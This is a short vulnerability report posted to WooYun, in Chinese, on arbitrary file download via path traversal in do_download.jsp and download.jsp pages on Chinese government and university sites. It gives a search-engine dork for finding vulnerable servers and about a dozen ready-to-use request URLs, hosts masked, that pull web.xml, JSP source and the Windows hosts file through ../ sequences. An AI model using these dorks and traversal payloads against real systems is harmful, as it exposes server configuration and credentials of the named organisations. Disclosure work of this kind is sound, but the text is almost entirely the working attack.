WooYun.org

其实找很简单 费不了那么长时间 自己漏洞发了很多 rank很少 求不给2rank
inurl:do_download.jsp download.jsp 就可以找到一些
http://**.**.**.**/do_download.jsp?path=C:\Windows\System32\drivers\etc\hosts&isLogin=1 江苏省科技型中小企业备案系统
http://**.**.**.**/zjk/download/do_download.jsp?filename=../web-inf/web.xml 中国机械工业科学技术奖
http://**.**.**.**/Common/Js/WebEdit/do_download.jsp?UpLoadPath=WebGlzx/DB/&FileName=../../web-inf/web.xml 交通部公路研究中心
http://**.**.**.**/setting/tabledown/do_download.jsp?url=/setting/table/../../web-inf/web.xml
http://**.**.**.**/www/do_download.jsp?filename=../do_download.jsp
http://**.**.**.**/synuedm/edm/website/secondpage/thirdpage/do_download.jsp?url=website/appendiximages/../../web-inf/web.xml
**.**.**.**/synuedm/edm/website/secondpage/thirdpage/do_download.jsp
?url=website/secondpage/../../web-inf/web.xml 浙江师范
这三个好像下载不来web.xml 不知道
http://**.**.**.**/download/download.jsp?filepath=download/download.jsp
http://**.**.**.**/download/download.jsp?filepath=download/download.jsp
http://**.**.**.**/download/download.jsp?filepath=download/../index.jsp